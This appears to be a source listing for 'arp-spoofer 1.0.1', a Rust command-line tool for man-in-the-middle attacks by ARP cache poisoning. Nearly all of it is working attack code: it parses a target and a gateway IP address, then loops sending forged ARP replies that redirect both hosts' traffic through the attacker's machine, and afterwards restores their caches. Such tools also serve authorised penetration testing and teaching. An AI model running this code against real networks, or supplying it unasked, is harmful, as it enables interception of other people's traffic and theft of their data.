arp-spoofer 1.0.1

A command-line tool to easily run a man-in-the-middle attack leveraging ARP cache poisoning.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205

extern crate pnet;
extern crate pnet_datalink;
extern crate clap;
extern crate indicatif;
extern crate console;
extern crate ctrlc;
extern crate atomic_enum;
extern crate anyhow;

use std::process;
use std::{thread, time};
use std::net::Ipv4Addr;
use std::sync::atomic::Ordering;
use pnet_datalink::NetworkInterface;
use atomic_enum::atomic_enum;

mod opts;
mod arp;
mod net;
mod logs;

// Declaration of the `getuid` function.
#[link(name = "c")]
extern "C" {
  fn getuid() -> u32;
}

/// Declaration of the `AttackState` type
/// which defines the state in which the attack
/// currently is.
#[atomic_enum]
#[derive(PartialEq)]
enum AttackState {
  Stopped = 0,
  CleanUp = 1,
  Running = 2
}

/// Static declaration of the current attack state.
static ATTACK_STATE: AtomicAttackState = AtomicAttackState::new(AttackState::Stopped);

/// Triggers the resolution of the MAC address associated
/// with a remote host IP address.
/// Returns the MAC address associated with the remote host,
/// panics otherwise.
/// 
/// # Arguments
/// 
/// * `iface` the network interface to send ARP packets through.
/// * `gateway_ip` the IP address of the network gateway.
///
fn resolve_arp_host(
  iface: &NetworkInterface,
  host_type: logs::resolution::HostType,
  host_ip: Ipv4Addr
) -> arp::ArpHost {
  logs::resolution::search(host_type, host_ip);
  let gateway = arp::resolve_arp_host(iface, host_ip).unwrap();
  logs::resolution::found(gateway);
  gateway
}

/// Runs a synchronous loop that will send ARP packets
/// to poison the ARP cache of the target and the gateway.
/// 
/// # Arguments
/// 
/// * `iface` the network interface to run the attack through.
/// * `target` the target host information.
/// * `gateway` the gateway host information.
/// 
fn run_arp_poisonning_attack(
  iface: &NetworkInterface,
  target: &arp::ArpHost,
  gateway: &arp::ArpHost
) {
  // Resolving the network interface MAC address.
  let local_mac = iface.mac.unwrap();

  logs::poisoning::state(logs::poisoning::State::InProgress);
  ATTACK_STATE.store(AttackState::Running, Ordering::Relaxed);
  loop {
    // Poisonning the cache of the target.
    arp::send_arp_reply(
      iface,
      arp::ArpHost { ip: gateway.ip, mac: local_mac },
      arp::ArpHost { ip: target.ip, mac: target.mac }
    )
    .unwrap()
    .expect("Could not send ARP packet");

    // Poisonning the cache of the gateway.
    arp::send_arp_reply(
      iface,
      arp::ArpHost { ip: target.ip, mac: local_mac },
      arp::ArpHost { ip: gateway.ip, mac: gateway.mac }
    )
    .unwrap()
    .expect("Could not send ARP packet");
    
    if ATTACK_STATE.load(Ordering::Relaxed) != AttackState::Running {
      break;
    }
    thread::sleep(time::Duration::from_secs(1));
  }
}

/// Attempts to restore the target and gateway ARP caches
/// to their initial values.
/// 
/// # Arguments
/// 
/// * `iface` the network interface to run the attack through.
/// * `target` the target host information.
/// * `gateway` the gateway host information.
/// 
fn run_arp_cleanup(
  iface: &NetworkInterface,
  target: &arp::ArpHost,
  gateway: &arp::ArpHost
) {
  logs::poisoning::state(logs::poisoning::State::CleanUp);
  for _ in 1..10 {
    // Restoring the cache of the target.
    arp::send_arp_reply(
      iface,
      arp::ArpHost { ip: gateway.ip, mac: gateway.mac },
      arp::ArpHost { ip: target.ip, mac: target.mac }
    )
    .unwrap()
    .expect("Could not send ARP packet");

    // Restoring the cache of the gateway.
    arp::send_arp_reply(
      iface,
      arp::ArpHost { ip: target.ip, mac: target.mac },
      arp::ArpHost { ip: gateway.ip, mac: gateway.mac }
    )
    .unwrap()
    .expect("Could not send ARP packet");
    
    thread::sleep(time::Duration::from_millis(500));
  }
}

fn main() {
  unsafe {
    if getuid() != 0 {
      panic!("This tool requires root privileges");
    }
  }

  // Registering a handler on a Ctrl-c that will
  // stop the attack.
  ctrlc::set_handler(move || {
    match ATTACK_STATE.load(Ordering::Relaxed) {
      AttackState::Stopped => process::exit(1),
      AttackState::Running => ATTACK_STATE.store(
        AttackState::CleanUp,
        Ordering::Relaxed
      ),
      AttackState::CleanUp => process::exit(1)
    }
  }).expect("Error setting Ctrl-C handler");

  let matches: clap::ArgMatches = opts::get_matches();
  // The given interface name.
  let interface_name: &String = matches
    .get_one::<String>("interface")
    .unwrap();
  // Parsing the target IP address.
  let target_ip: Ipv4Addr = matches
    .get_one::<String>("target")
    .unwrap()
    .parse()
    .expect("The target must be a valid IPv4 address");
  // Parsing the gateway IP address.
  let gateway_ip: Ipv4Addr = matches
    .get_one::<String>("gateway")
    .unwrap()
    .parse()
    .expect("The gateway must be a valid IPv4 address");
  // Resolving the network interface associated to the given name.
  let iface = net::find_network_interface(interface_name).unwrap();

  // Verifying whether the IP address is not the local IP address.
  match net::get_ipv4_addr_of(&iface) {
    Some(x) => if x == target_ip { panic!("Cannot use local ip as target ip"); },
    None => panic!("Could not resolve local IPv4 address")
  };
  
  // Resolving the MAC address of the target IP address.
  let target = resolve_arp_host(&iface, logs::resolution::HostType::Target, target_ip);

  // Resolving the MAC address of the gateway IP address.
  let gateway = resolve_arp_host(&iface, logs::resolution::HostType::Gateway, gateway_ip);
  
  // Running the attack.
  run_arp_poisonning_attack(&iface, &target, &gateway);

  // Cleaning up the remote ARP cache.
  run_arp_cleanup(&iface, &target, &gateway);

  logs::poisoning::state(logs::poisoning::State::Stopped);
}